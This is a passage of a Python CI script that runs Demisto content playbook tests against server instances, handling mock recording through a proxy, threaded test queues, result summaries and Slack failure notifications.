'tests on(Valid only when using AMI)', default="NonAMI")
parser.add_argument('-l', '--testsList', help='List of specific, comma separated'
'tests to run')
options = parser.parse_args()
tests_settings = TestsSettings(options)
return tests_settings
class TestsSettings:
def __init__(self, options):
self.api_key = options.apiKey
self.server = options.server
self.conf_path = options.conf
self.secret_conf_path = options.secret
self.nightly = options.nightly
self.slack = options.slack
self.circleci = options.circleci
self.buildNumber = options.buildNumber
self.buildName = options.buildName
self.isAMI = options.isAMI
self.memCheck = options.memCheck
self.serverVersion = options.serverVersion
self.serverNumericVersion = None
self.specific_tests_to_run = self.parse_tests_list_arg(options.testsList)
self.is_local_run = (self.server is not None)
@staticmethod
def parse_tests_list_arg(tests_list):
tests_to_run = tests_list.split(",") if tests_list else []
return tests_to_run
class PrintJob:
def __init__(self, message_to_print, print_function_to_execute, message_color=None):
self.print_function_to_execute = print_function_to_execute
self.message_to_print = message_to_print
self.message_color = message_color
def execute_print(self):
if self.message_color:
self.print_function_to_execute(self.message_to_print, self.message_color)
else:
self.print_function_to_execute(self.message_to_print)
class ParallelPrintsManager:
def __init__(self, number_of_threads):
self.threads_print_jobs = [[] for i in range(number_of_threads)]
self.print_lock = threading.Lock()
self.threads_last_update_times = [time.time() for i in range(number_of_threads)]
def should_update_thread_status(self, thread_index):
current_time = time.time()
thread_last_update = self.threads_last_update_times[thread_index]
return current_time - thread_last_update > 300
def add_print_job(self, message_to_print, print_function_to_execute, thread_index, message_color=None,
include_timestamp=False):
if include_timestamp:
message_to_print = f'[{datetime.datetime.now(datetime.timezone.utc)}] {message_to_print}'
print_job = PrintJob(message_to_print, print_function_to_execute, message_color=message_color)
self.threads_print_jobs[thread_index].append(print_job)
if self.should_update_thread_status(thread_index):
print("Thread {} is still running.".format(thread_index))
self.threads_last_update_times[thread_index] = time.time()
def execute_thread_prints(self, thread_index):
self.print_lock.acquire()
prints_to_execute = self.threads_print_jobs[thread_index]
for print_job in prints_to_execute:
print_job.execute_print()
self.print_lock.release()
self.threads_print_jobs[thread_index] = []
class TestsDataKeeper:
def __init__(self):
self.succeeded_playbooks = []
self.failed_playbooks = []
self.skipped_tests = []
self.skipped_integrations = []
self.rerecorded_tests = []
self.empty_files = []
self.unmockable_integrations = {}
def add_tests_data(self, succeed_playbooks, failed_playbooks, skipped_tests, skipped_integration,
unmockable_integrations):
# Using multiple appends and not extend since append is guaranteed to be thread safe
for playbook in succeed_playbooks:
self.succeeded_playbooks.append(playbook)
for playbook in failed_playbooks:
self.failed_playbooks.append(playbook)
for playbook in skipped_tests:
self.skipped_tests.append(playbook)
for playbook in skipped_integration:
self.skipped_integrations.append(playbook)
for playbook_id, reason in unmockable_integrations.items():
self.unmockable_integrations[playbook_id] = reason
def add_proxy_related_test_data(self, proxy):
# Using multiple appends and not extend since append is guaranteed to be thread safe
for playbook_id in proxy.rerecorded_tests:
self.rerecorded_tests.append(playbook_id)
for playbook_id in proxy.empty_files:
self.empty_files.append(playbook_id)
def print_test_summary(tests_data_keeper, is_ami=True):
succeed_playbooks = tests_data_keeper.succeeded_playbooks
failed_playbooks = tests_data_keeper.failed_playbooks
skipped_tests = tests_data_keeper.skipped_tests
unmocklable_integrations = tests_data_keeper.unmockable_integrations
skipped_integration = tests_data_keeper.skipped_integrations
rerecorded_tests = tests_data_keeper.rerecorded_tests
empty_files = tests_data_keeper.empty_files
succeed_count = len(succeed_playbooks)
failed_count = len(failed_playbooks)
skipped_count = len(skipped_tests)
rerecorded_count = len(rerecorded_tests) if is_ami else 0
empty_mocks_count = len(empty_files) if is_ami else 0
unmocklable_integrations_count = len(unmocklable_integrations)
print('\nTEST RESULTS:')
tested_playbooks_message = '\t Number of playbooks tested - ' + str(succeed_count + failed_count)
print(tested_playbooks_message)
succeeded_playbooks_message = '\t Number of succeeded tests - ' + str(succeed_count)
print_color(succeeded_playbooks_message, LOG_COLORS.GREEN)
if failed_count > 0:
failed_tests_message = '\t Number of failed tests - ' + str(failed_count) + ':'
print_error(failed_tests_message)
for playbook_id in failed_playbooks:
print_error('\t - ' + playbook_id)
if rerecorded_count > 0:
recording_warning = '\t Tests with failed playback and successful re-recording - ' + str(rerecorded_count) + ':'
print_warning(recording_warning)
for playbook_id in rerecorded_tests:
print_warning('\t - ' + playbook_id)
if empty_mocks_count > 0:
empty_mock_successes_msg = '\t Successful tests with empty mock files - ' + str(empty_mocks_count) + ':'
print(empty_mock_successes_msg)
proxy_explanation = '\t (either there were no http requests or no traffic is passed through the proxy.\n' \
'\t Investigate the playbook and the integrations.\n' \
'\t If the integration has no http traffic, add to unmockable_integrations in conf.json)'
print(proxy_explanation)
for playbook_id in empty_files:
print('\t - ' + playbook_id)
if len(skipped_integration) > 0:
skipped_integrations_warning = '\t Number of skipped integration - ' + str(len(skipped_integration)) + ':'
print_warning(skipped_integrations_warning)
for playbook_id in skipped_integration:
print_warning('\t - ' + playbook_id)
if skipped_count > 0:
skipped_tests_warning = '\t Number of skipped tests - ' + str(skipped_count) + ':'
print_warning(skipped_tests_warning)
for playbook_id in skipped_tests:
print_warning('\t - ' + playbook_id)
if unmocklable_integrations_count > 0:
unmockable_warning = '\t Number of unmockable integrations - ' + str(unmocklable_integrations_count) + ':'
print_warning(unmockable_warning)
for playbook_id, reason in unmocklable_integrations.items():
print_warning('\t - ' + playbook_id + ' - ' + reason)
def update_test_msg(integrations, test_message):
if integrations:
integrations_names = [integration['name'] for integration in
integrations]
test_message = test_message + ' with integration(s): ' + ','.join(
integrations_names)
return test_message
def turn_off_telemetry(server, demisto_api_key):
"""
Turn off telemetry on the AMI instance
:param server: demisto server to connect to
:param demisto_api_key: api key to use for connection
:return: None
"""
client = demisto_client.configure(base_url=server, api_key=demisto_api_key, verify_ssl=False)
body, status_code, _ = demisto_client.generic_request_func(self=client, method='POST',
path='/telemetry?status=notelemetry')
if status_code != 200:
print_error('Request to turn off telemetry failed with status code "{}"\n{}'.format(status_code, body))
sys.exit(1)
def reset_containers(server, demisto_api_key, prints_manager, thread_index):
prints_manager.add_print_job('Resetting containers', print, thread_index)
client = demisto_client.configure(base_url=server, api_key=demisto_api_key, verify_ssl=False)
body, status_code, _ = demisto_client.generic_request_func(self=client, method='POST',
path='/containers/reset')
if status_code != 200:
error_msg = 'Request to reset containers failed with status code "{}"\n{}'.format(status_code, body)
prints_manager.add_print_job(error_msg, print_error, thread_index)
prints_manager.execute_thread_prints(thread_index)
sys.exit(1)
sleep(10)
def has_unmockable_integration(integrations, unmockable_integrations):
return list(set(x['name'] for x in integrations).intersection(unmockable_integrations.keys()))
def get_docker_limit():
process = subprocess.Popen(['cat', '/sys/fs/cgroup/memory/memory.limit_in_bytes'], stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
stdout, stderr = process.communicate()
return stdout, stderr
def get_docker_processes_data():
process = subprocess.Popen(['ps', 'aux'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, stderr = process.communicate()
return stdout, stderr
def get_docker_memory_data():
process = subprocess.Popen(['cat', '/sys/fs/cgroup/memory/memory.usage_in_bytes'], stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
stdout, stderr = process.communicate()
return stdout, stderr
def send_slack_message(slack, chanel, text, user_name, as_user):
sc = SlackClient(slack)
sc.api_call(
"chat.postMessage",
channel=chanel,
username=user_name,
as_user=as_user,
text=text,
mrkdwn='true'
)
def run_test_logic(conf_json_test_details, tests_queue, tests_settings, c, failed_playbooks, integrations, playbook_id,
succeed_playbooks, test_message, test_options, slack, circle_ci, build_number, server_url,
build_name, prints_manager, thread_index=0, is_mock_run=False):
with acquire_test_lock(integrations,
test_options.get('timeout'),
prints_manager,
thread_index,
tests_settings.conf_path) as lock:
if lock:
status, inc_id = test_integration(c, server_url, integrations, playbook_id, prints_manager, test_options,
is_mock_run, thread_index=thread_index)
# c.api_client.pool.close()
if status == PB_Status.COMPLETED:
prints_manager.add_print_job('PASS: {} succeed'.format(test_message), print_color, thread_index,
message_color=LOG_COLORS.GREEN)
succeed_playbooks.append(playbook_id)
elif status == PB_Status.NOT_SUPPORTED_VERSION:
not_supported_version_message = 'PASS: {} skipped - not supported version'.format(test_message)
prints_manager.add_print_job(not_supported_version_message, print, thread_index)
succeed_playbooks.append(playbook_id)
else:
error_message = 'Failed: {} failed'.format(test_message)
prints_manager.add_print_job(error_message, print_error, thread_index)
playbook_id_with_mock = playbook_id
if not is_mock_run:
playbook_id_with_mock += " (Mock Disabled)"
failed_playbooks.append(playbook_id_with_mock)
if not tests_settings.is_local_run:
notify_failed_test(slack, circle_ci, playbook_id, build_number, inc_id, server_url, build_name)
succeed = status in (PB_Status.COMPLETED, PB_Status.NOT_SUPPORTED_VERSION)
else:
tests_queue.put(conf_json_test_details)
succeed = False
return succeed
# run the test using a real instance, record traffic.
def run_and_record(conf_json_test_details, tests_queue, tests_settings, c, proxy, failed_playbooks, integrations,
playbook_id, succeed_playbooks, test_message, test_options, slack, circle_ci, build_number,
server_url, build_name, prints_manager, thread_index=0):
proxy.set_tmp_folder()
proxy.start(playbook_id, record=True, thread_index=thread_index, prints_manager=prints_manager)
succeed = run_test_logic(conf_json_test_details, tests_queue, tests_settings, c, failed_playbooks, integrations,
playbook_id, succeed_playbooks, test_message, test_options, slack, circle_ci, build_number,
server_url, build_name, prints_manager, thread_index=thread_index, is_mock_run=True)
proxy.stop(thread_index=thread_index, prints_manager=prints_manager)
if succeed:
proxy.clean_mock_file(playbook_id, thread_index=thread_index, prints_manager=prints_manager)
proxy.move_mock_file_to_repo(playbook_id, thread_index=thread_index, prints_manager=prints_manager)
proxy.set_repo_folder()
return succeed
def mock_run(conf_json_test_details, tests_queue, tests_settings, c, proxy, failed_playbooks, integrations,
playbook_id, succeed_playbooks, test_message, test_options, slack, circle_ci, build_number, server_url,
build_name, start_message, prints_manager, thread_index=0):
rerecord = False
if proxy.has_mock_file(playbook_id):
start_mock_message = '{} (Mock: Playback)'.format(start_message)
prints_manager.add_print_job(start_mock_message, print, thread_index, include_timestamp=True)
proxy.start(playbook_id, thread_index=thread_index, prints_manager=prints_manager)
# run test
status, _ = test_integration(c, server_url, integrations, playbook_id, prints_manager, test_options,
is_mock_run=True, thread_index=thread_index)
# use results
proxy.stop(thread_index=thread_index, prints_manager=prints_manager)
if status == PB_Status.COMPLETED:
succeed_message = 'PASS: {} succeed'.format(test_message)
prints_manager.add_print_job(succeed_message, print_color, thread_index, LOG_COLORS.GREEN)
succeed_playbooks.append(playbook_id)
end_mock_message = f'------ Test {test_message} end ------\n'
prints_manager.add_print_job(end_mock_message, print, thread_index, include_timestamp=True)
return
if status == PB_Status.NOT_SUPPORTED_VERSION:
not_supported_version_message = 'PASS: {} skipped - not supported version'.format(test_message)
prints_manager.add_print_job(not_supported_version_message, print, thread_index)
succeed_playbooks.append(playbook_id)
end_mock_message = f'------ Test {test_message} end ------\n'
prints_manager.add_print_job(end_mock_message, print, thread_index, include_timestamp=True)
return
if status == PB_Status.FAILED_DOCKER_TEST:
error_message = 'Failed: {} failed'.format(test_message)
prints_manager.add_print_job(error_message, print_error, thread_index)
failed_playbooks.append(playbook_id)
end_mock_message = f'------ Test {test_message} end ------\n'
prints_manager.add_print_job(end_mock_message, print, thread_index, include_timestamp=True)
return
mock_failed_message = "Test failed with mock, recording new mock file. (Mock: Recording)"
prints_manager.add_print_job(mock_failed_message, print, thread_index)
rerecord = True
else:
mock_recording_message = start_message + ' (Mock: Recording)'
prints_manager.add_print_job(mock_recording_message, print, thread_index, include_timestamp=True)
# Mock recording - no mock file or playback failure.
c = demisto_client.configure(base_url=c.api_client.configuration.host,
api_key=c.api_client.configuration.api_key, verify_ssl=False)
succeed = run_and_record(conf_json_test_details, tests_queue, tests_settings, c, proxy, failed_playbooks,
integrations, playbook_id, succeed_playbooks, test_message, test_options, slack, circle_ci,
build_number, server_url, build_name, prints_manager, thread_index=thread_index)
if rerecord and succeed:
proxy.rerecorded_tests.append(playbook_id)
test_end_message = f'------ Test {test_message} end ------\n'
prints_manager.add_print_job(test_end_message, print, thread_index, include_timestamp=True)
def run_test(conf_json_test_details, tests_queue, tests_settings, demisto_api_key, proxy, failed_playbooks,
integrations, unmockable_integrations, playbook_id, succeed_playbooks, test_message, test_options,
slack, circle_ci, build_number, server_url, build_name, prints_manager, is_ami=True, thread_index=0):
start_message = f'------ Test {test_message} start ------'
client = demisto_client.configure(base_url=server_url, api_key=demisto_api_key, verify_ssl=False)
if not is_ami or (not integrations or has_unmockable_integration(integrations, unmockable_integrations)):
prints_manager.add_print_job(start_message + ' (Mock: Disabled)', print, thread_index, include_timestamp=True)
run_test_logic(conf_json_test_details, tests_queue, tests_settings, client, failed_playbooks, integrations,
playbook_id, succeed_playbooks, test_message, test_options, slack, circle_ci, build_number,
server_url, build_name, prints_manager, thread_index=thread_index)
prints_manager.add_print_job('------ Test %s end ------\n' % (test_message,), print, thread_index,
include_timestamp=True)
return
mock_run(conf_json_test_details, tests_queue, tests_settings, client, proxy, failed_playbooks, integrations,
playbook_id, succeed_playbooks, test_message, test_options, slack, circle_ci, build_number,
server_url, build_name, start_message, prints_manager, thread_index=thread_index)
def http_request(url, params_dict=None):
try:
res = requests.request("GET",
url,
verify=True,
params=params_dict,
)
res.raise_for_status()
return res.json()
except Exception as e:
raise e
def get_user_name_from_circle(circleci_token, build_number):
url = "https://circleci.com/api/v1.1/project/github/demisto/content/{0}?circle-token={1}".format(build_number,
circleci_token)
res = http_request(url)
user_details = res.get('user', {})
return user_details.get('name', '')
def notify_failed_test(slack, circle_ci, playbook_id, build_number, inc_id, server_url, build_name):
circle_user_name = get_user_name_from_circle(circle_ci, build_number)
sc = SlackClient(slack)
user_id = retrieve_id(circle_user_name, sc)
text = "{0} - {1} Failed\n{2}".format(build_name, playbook_id, server_url) if inc_id == -1 \
else "{0} - {1} Failed\n{2}/#/WorkPlan/{3}".format(build_name, playbook_id, server_url, inc_id)
if user_id:
sc.api_call(
"chat.postMessage",
channel=user_id,
username="Content CircleCI",
as_user="False",
text=text
)
def retrieve_id(circle_user_name, sc):
user_id = ''
res = sc.api_call('users.list')
user_list = res.get('members', [])
for user in user_list:
profile = user.get('profile', {})
name = profile.get('real_name_normalized', '')
if name == circle_user_name:
user_id = user.get('id', '')
return user_id
def create_result_files(tests_data_keeper):
failed_playbooks = tests_data_keeper.failed_playbooks
skipped_integration = tests_data_keeper.skipped_integrations
skipped_tests = tests_data_keeper.skipped_tests
with open("./Tests/failed_tests.txt", "w") as failed_tests_file:
failed_tests_file.write('\n'.join(failed_playbooks))
with open('./Tests/skipped_tests.txt', "w") as skipped_tests_file:
skipped_tests_file.write('\n'.join(skipped_tests))
with open('./Tests/skipped_integrations.txt', "w") as skipped_integrations_file:
skipped_integrations_file.write('\n'.join(skipped_integration))
def change_placeholders_to_values(placeholders_map, config_item):
"""Replaces placeholders in the object to their real values
Args:
placeholders_map: (dict)
Dict that holds the real values to be replaced for each placeholder.
config_item: (json object)
Integration configuration object.
Returns:
dict. json object with the real configuration.
"""
item_as_string = json.dumps(config_item)
for key, value in placeholders_map.items():
item_as_string = item_as_string.replace(key, value)
return json.loads(item_as_string)
def set_integration_params(demisto_api_key, integrations, secret_params, instance_names, playbook_id,
prints_manager, placeholders_map, thread_index=0):
for integration in integrations:
integration_params = [change_placeholders_to_values(placeholders_map, item) for item
in secret_params if item['name'] == integration['name']]
if integration_params:
matched_integration_params = integration_params[0]
if len(integration_params) != 1:
found_matching_instance = False
for item in integration_params:
if item.get('instance_name', 'Not Found') in instance_names:
matched_integration_params = item
found_matching_instance = True
if not found_matching_instance:
optional_instance_names = [optional_integration.get('instance_name', 'None')
for optional_integration in integration_params]
error_msg = FAILED_MATCH_INSTANCE_MSG.format(playbook_id, len(integration_params),
integration['name'],
'\n'.join(optional_instance_names))
prints_manager.add_print_job(error_msg, print_error, thread_index)
return False
integration['params'] = matched_integration_params.get('params', {})
integration['byoi'] = matched_integration_params.get('byoi', True)
integration['instance_name'] = matched_integration_params.get('instance_name', integration['name'])
integration['validate_test'] = matched_integration_params.get('validate_test', True)
elif integration['name'] == 'Demisto REST API':
integration['params'] = {
'url': 'https://localhost',
'apikey': demisto_api_key,
'insecure': True,
}
return True
def collect_integrations(integrations_conf, skipped_integration, skipped_integrations_conf, nightly_integrations):
integrations = []
is_nightly_integration = False
test_skipped_integration = []
for integration in integrations_conf:
if integration in skipped_integrations_conf.keys():
skipped_integration.add("{0} - reason: {1}".format(integration, skipped_integrations_conf[integration]))
test_skipped_integration.append(integration)
if integration in nightly_integrations:
is_nightly_integration = True
# string description
integrations.append({
'name': integration,
'params': {}
})
return test_skipped_integration, integrations, is_nightly_integration
def extract_filtered_tests(is_nightly):
if is_nightly:
# TODO: verify this response
return [], False, True
with open(FILTER_CONF, 'r') as filter_file:
filtered_tests = filter_file.readlines()
filtered_tests = [line.strip('\n') for line in filtered_tests]
is_filter_configured = bool(filtered_tests)
run_all = RUN_ALL_TESTS_FORMAT in filtered_tests
return filtered_tests, is_filter_configured, run_all
def load_conf_files(conf_path, secret_conf_path):
with open(conf_path) as data_file:
conf = json.load(data_file)
secret_conf = None
if secret_conf_path:
with open(secret_conf_path) as data_file:
secret_conf = json.load(data_file)
return conf, secret_conf
def run_test_scenario(tests_queue, tests_settings, t, proxy, default_test_timeout, skipped_tests_conf, nightly_integrations,
skipped_integrations_conf, skipped_integration, is_nightly, run_all_tests, is_filter_configured,
filtered_tests, skipped_tests, secret_params, failed_playbooks, playbook_skipped_integration,
unmockable_integrations, succeed_playbooks, slack, circle_ci, build_number, server, build_name,
server_numeric_version, demisto_api_key, prints_manager, thread_index=0, is_ami=True):
playbook_id = t['playbookID']
nightly_test = t.get('nightly', False)
integrations_conf = t.get('integrations', [])
instance_names_conf = t.get('instance_names', [])
test_message = 'playbook: ' + playbook_id
test_options = {
'timeout': t.get('timeout', default_test_timeout),
'memory_threshold': t.get('memory_threshold', Docker.DEFAULT_CONTAINER_MEMORY_USAGE),
'pid_threshold': t.get('pid_threshold', Docker.DEFAULT_CONTAINER_PIDS_USAGE)
}
if not isinstance(integrations_conf, list):
integrations_conf = [integrations_conf, ]
if not isinstance(instance_names_conf, list):
instance_names_conf = [instance_names_conf, ]
test_skipped_integration, integrations, is_nightly_integration = collect_integrations(
integrations_conf, skipped_integration, skipped_integrations_conf, nightly_integrations)
if playbook_id in filtered_tests:
playbook_skipped_integration.update(test_skipped_integration)
skip_nightly_test = (nightly_test or is_nightly_integration) and not is_nightly
# Skip nightly test
if skip_nightly_test:
prints_manager.add_print_job(f'\n------ Test {test_message} start ------', print, thread_index,
include_timestamp=True)
prints_manager.add_print_job('Skip test', print, thread_index)
prints_manager.add_print_job(f'------ Test {test_message} end ------\n', print, thread_index,
include_timestamp=True)
return
if not run_all_tests:
# Skip filtered test
if is_filter_configured and playbook_id not in filtered_tests:
return
# Skip bad test
if playbook_id in skipped_tests_conf:
skipped_tests.add(f'{playbook_id} - reason: {skipped_tests_conf[playbook_id]}')
return
# Skip integration
if test_skipped_integration:
return
# Skip version mismatch test
test_from_version = t.get('fromversion', '0.0.0')
test_to_version = t.get('toversion', '99.99.99')
if not (LooseVersion(test_from_version) <= LooseVersion(server_numeric_version) <= LooseVersion(test_to_version)):
prints_manager.add_print_job(f'\n------ Test {test_message} start ------', print, thread_index,
include_timestamp=True)
warning_message = 'Test {} ignored due to version mismatch (test versions: {}-{})'.format(test_message,
test_from_version,
test_to_version)
prints_manager.add_print_job(warning_message, print_warning, thread_index)
prints_manager.add_print_job(f'------ Test {test_message} end ------\n', print, thread_index,
include_timestamp=True)
return
placeholders_map = {'%%SERVER_HOST%%': server}
are_params_set = set_integration_params(demisto_api_key, integrations, secret_params, instance_names_conf,
playbook_id, prints_manager, placeholders_map, thread_index=thread_index)
if not are_params_set:
failed_playbooks.append(playbook_id)
return
test_message = update_test_msg(integrations, test_message)
options = options_handler()
stdout, stderr = get_docker_memory_data()
text = 'Memory Usage: {}'.format(stdout) if not stderr else stderr
if options.nightly and options.memCheck and not tests_settings.is_local_run:
send_slack_message(slack, SLACK_MEM_CHANNEL_ID, text, 'Content CircleCI', 'False')
stdout, stderr = get_docker_processes_data()
text = stdout if not stderr else stderr
send_slack_message(slack, SLACK_MEM_CHANNEL_ID, text, 'Content CircleCI', 'False')
run_test(t, tests_queue, tests_settings, demisto_api_key, proxy, failed_playbooks, integrations, unmockable_integrations,
playbook_id, succeed_playbooks, test_message, test_options, slack, circle_ci,
build_number, server, build_name, prints_manager, is_ami, thread_index=thread_index)
def get_server_numeric_version(ami_env, is_local_run=False):
"""
Gets the current server version
Arguments:
ami_env: (str)
AMI version name.
is_local_run: (bool)
when running locally, assume latest version.
Returns:
(str) Server numeric version
"""
default_version = '99.99.98'
env_results_path = './env_results.json'
if is_local_run:
print_color(f'Local run, assuming server version is {default_version}', LOG_COLORS.GREEN)
return default_version
if not os.path.isfile(env_results_path):
print_warning(f'Did not find {env_results_path} file, assuming server version is {default_version}.')
return default_version
with open(env_results_path, 'r') as json_file:
env_results = json.load(json_file)
instances_ami_names = set([env.get('AmiName') for env in env_results if ami_env in env.get('Role', '')])
if len(instances_ami_names) != 1:
print_warning(f'Did not get one AMI Name, got {instances_ami_names}.'
f' Assuming server version is {default_version}')
return default_version
instances_ami_name = list(instances_ami_names)[0]
extracted_version = re.findall(r'Demisto-(?:Circle-CI|MarketPlace)-Content-[\w-]+-([\d.]+)-[\d]{5}',
instances_ami_name)
if extracted_version:
server_numeric_version = extracted_version[0]
else:
server_numeric_version = default_version
# make sure version is three-part version
if server_numeric_version.count('.') == 1:
server_numeric_version += ".0"
print_color(f'Server version: {server_numeric_version}', LOG_COLORS.GREEN)
return server_numeric_version
def get_instances_ips_and_names(tests_settings):
if tests_settings.server:
return [tests_settings.server]
with open('./Tests/instance_ips.txt', 'r') as instance_file:
instance_ips = instance_file.readlines()
instance_ips = [line.strip('\n').split(":") for line in instance_ips]
return instance_ips
def get_test_records_of_given_test_names(tests_settings, tests_names_to_search):
conf, secret_conf = load_conf_files(tests_settings.conf_path, tests_settings.secret_conf_path)
tests_records = conf['tests']
test_records_with_supplied_names = []
for test_record in tests_records:
test_name = test_record.get("playbookID")
if test_name and test_name in tests_names_to_search:
test_records_with_supplied_names.append(test_record)
return test_records_with_supplied_names
def execute_testing(tests_settings, server_ip, mockable_tests_names, unmockable_tests_names,
tests_data_keeper, prints_manager, thread_index=0, is_ami=True):
server = SERVER_URL.format(server_ip)
server_numeric_version = tests_settings.serverNumericVersion
start_message = "Executing tests with the server {} - and the server ip {}".format(server, server_ip)
prints_manager.add_print_job(start_message, print, thread_index)
is_nightly = tests_settings.nightly
is_memory_check = tests_settings.memCheck
slack = tests_settings.slack
circle_ci = tests_settings.circleci
build_number = tests_settings.buildNumber
build_name = tests_settings.buildName
conf, secret_conf = load_conf_files(tests_settings.conf_path, tests_settings.secret_conf_path)
demisto_api_key = tests_settings.api_key
default_test_timeout = conf.get('testTimeout', 30)
tests = conf['tests']
skipped_tests_conf = conf['skipped_tests']
nightly_integrations = conf['nightly_integrations']
skipped_integrations_conf = conf['skipped_integrations']
unmockable_integrations = conf['unmockable_integrations']
secret_params = secret_conf['integrations'] if secret_conf else []
filtered_tests, is_filter_configured, run_all_tests = extract_filtered_tests(tests_settings.nightly)
if is_filter_configured and not run_all_tests:
is_nightly = True
if not tests or len(tests) == 0:
prints_manager.add_print_job('no integrations are configured for test', print, thread_index)
prints_manager.execute_thread_prints(thread_index)
return
# turn off telemetry
turn_off_telemetry(server, demisto_api_key)
proxy = None
if is_ami:
ami = AMIConnection(server_ip)
ami.clone_mock_data()
proxy = MITMProxy(server_ip)
failed_playbooks = []
succeed_playbooks = []
skipped_tests = set([])
skipped_integration = set([])
playbook_skipped_integration = set([])
disable_all_integrations(demisto_api_key, server, prints_manager, thread_index=thread_index)
prints_manager.execute_thread_prints(thread_index)
mockable_tests = get_test_records_of_given_test_names(tests_settings, mockable_tests_names)
unmockable_tests = get_test_records_of_given_test_names(tests_settings, unmockable_tests_names)
if is_nightly and is_memory_check:
mem_lim, err = get_docker_limit()
send_slack_message(slack, SLACK_MEM_CHANNEL_ID,
f'Build Number: {build_number}\n Server Address: {server}\nMemory Limit: {mem_lim}',
'Content CircleCI', 'False')
try:
# first run the mock tests to avoid mockless side effects in container
if is_ami and mockable_tests:
proxy.configure_proxy_in_demisto(demisto_api_key, server, proxy.ami.docker_ip + ':' + proxy.PROXY_PORT)
executed_in_current_round, mockable_tests_queue = initialize_queue_and_executed_tests_set(mockable_tests)
while not mockable_tests_queue.empty():
t = mockable_tests_queue.get()
executed_in_current_round = update_round_set_and_sleep_if_round_completed(executed_in_current_round,
prints_manager,
t,
thread_index,
mockable_tests_queue)
run_test_scenario(mockable_tests_queue, tests_settings, t, proxy, default_test_timeout, skipped_tests_conf,
nightly_integrations, skipped_integrations_conf, skipped_integration, is_nightly,
run_all_tests, is_filter_configured, filtered_tests,
skipped_tests, secret_params, failed_playbooks, playbook_skipped_integration,
unmockable_integrations, succeed_playbooks, slack, circle_ci, build_number, server,
build_name, server_numeric_version, demisto_api_key, prints_manager,
thread_index=thread_index)
proxy.configure_proxy_in_demisto(demisto_api_key, server, '')
# reset containers after clearing the proxy server configuration
reset_containers(server, demisto_api_key, prints_manager, thread_index)
prints_manager.add_print_job("\nRunning mock-disabled tests", print, thread_index)
executed_in_current_round, unmockable_tests_queue = initialize_queue_and_executed_tests_set(unmockable_tests)
while not unmockable_tests_queue.empty():
t = unmockable_tests_queue.get()
executed_in_current_round = update_round_set_and_sleep_if_round_completed(executed_in_current_round,
prints_manager,
t,
thread_index,
unmockable_tests_queue)
run_test_scenario(unmockable_tests_queue, tests_settings, t, proxy, default_test_timeout,
skipped_tests_conf, nightly_integrations, skipped_integrations_conf, skipped_integration,
is_nightly, run_all_tests, is_filter_configured, filtered_tests, skipped_tests,
secret_params, failed_playbooks, playbook_skipped_integration, unmockable_integrations,
succeed_playbooks, slack, circle_ci, build_number, server, build_name,
server_numeric_version, demisto_api_key, prints_manager, thread_index, is_ami)
prints_manager.execute_thread_prints(thread_index)
except Exception as exc:
prints_manager.add_print_job(f'~~ Thread {thread_index + 1} failed ~~\n{str(exc)}\n{traceback.format_exc()}',
print_error, thread_index)
prints_manager.execute_thread_prints(thread_index)
failed_playbooks.append(f'~~ Thread {thread_index + 1} failed ~~')
raise
finally:
tests_data_keeper.add_tests_data(succeed_playbooks, failed_playbooks, skipped_tests,
skipped_integration, unmockable_integrations)
if is_ami:
tests_data_keeper.add_proxy_related_test_data(proxy)
if build_name == 'master':
updating_mocks_msg = "Pushing new/updated mock files to mock git repo."
prints_manager.add_print_job(updating_mocks_msg, print, thread_index)
ami.upload_mock_files(build_name, build_number)
if playbook_skipped_integration and build_name == 'master':
comment = 'The following integrations are skipped and critical for the test:\n {}'. \
format('\n- '.join(playbook_skipped_integration))
add_pr_comment(comment)
def update_round_set_and_sleep_if_round_completed(executed_in_current_round: set,
prints_manager: ParallelPrintsManager,
t: dict,
thread_index: int,
unmockable_tests_queue: Queue) -> set:
"""
Checks if the string representation of the current test configuration is already in
the executed_in_current_round set.
If it is- it means we have already executed this test and the we have reached a round and there are tests that
were not able to be locked by this execution..
In that case we want to start a new round monitoring by emptying the 'executed_in_current_round' set and sleep
in order to let the tests be unlocked
Args:
executed_in_current_round: A set containing the string representation of all tests configuration as they appear
in conf.json file that were already executed in the current round
prints_manager: ParallelPrintsManager object
t: test configuration as it appears in conf.json file
thread_index: Currently executing thread
unmockable_tests_queue: The queue of remaining tests
Returns:
A new executed_in_current_round set which contains only the current tests configuration if a round was completed
else it just adds the new test to the set.
"""
if str(t) in executed_in_current_round:
prints_manager.add_print_job(
'all tests in the queue were executed, sleeping for 30 seconds to let locked tests get unlocked.',
print,
thread_index)
executed_in_current_round = set()
time.sleep(30)
executed_in_current_round.add(str(t))
return executed_in_current_round
def initialize_queue_and_executed_tests_set(tests):
tests_queue = Queue()
already_executed_test_playbooks = set()
for t in tests:
tests_queue.put(t)
return already_executed_test_playbooks, tests_queue
def get_unmockable_tests(tests_settings):
conf, _ = load_conf_files(tests_settings.conf_path, tests_settings.secret_conf_path)
unmockable_integrations = conf['unmockable_integrations']
tests = conf['tests']
unmockable_tests = []
for test_record in tests:
test_name = test_record.get("playbookID")
integrations_used_in_test = get_used_integrations(test_record)
unmockable_integrations_used = [integration_name for integration_name in integrations_used_in_test if
integration_name in unmockable_integrations]
if test_name and (not integrations_used_in_test or unmockable_integrations_used):
unmockable_tests.append(test_name)
return unmockable_tests
def get_all_tests(tests_settings):
conf, _ = load_conf_files(tests_settings.conf_path, tests_settings.secret_conf_path)
tests_records = conf['tests']
all_tests = []
for test_record in tests_records:
test_name = test_record.get("playbookID")
if test_name:
all_tests.append(test_name)
return all_tests
def manage_tests(tests_settings):
"""
This function manages the execution of Demisto's tests.
Args:
tests_settings (TestsSettings): An object containing all the relevant data regarding how the tests should be ran
"""
tests_settings.serverNumericVersion = get_server_numeric_version(tests_settings.serverVersion,
tests_settings.is_local_run)
instances_ips = get_instances_ips_and_names(tests_settings)
is_nightly = tests_settings.nightly
number_of_instances = len(instances_ips)
prints_manager = ParallelPrintsManager(number_of_instances)
tests_data_keeper = TestsDataKeeper()
if tests_settings.server:
# If the user supplied a server - all tests will be done on that server.
server_ip = tests_settings.server
print_color("Starting tests for {}".format(server_ip), LOG_COLORS.GREEN)
print("Starts tests with server url - https://{}".format(server_ip))
all_tests = get_all_tests(tests_settings)
mockable_tests = []
print(tests_settings.specific_tests_to_run)
unmockable_tests = tests_settings.specific_tests_to_run if tests_settings.specific_tests_to_run else all_tests
execute_testing(tests_settings, server_ip, mockable_tests, unmockable_tests, tests_data_keeper, prints_manager,
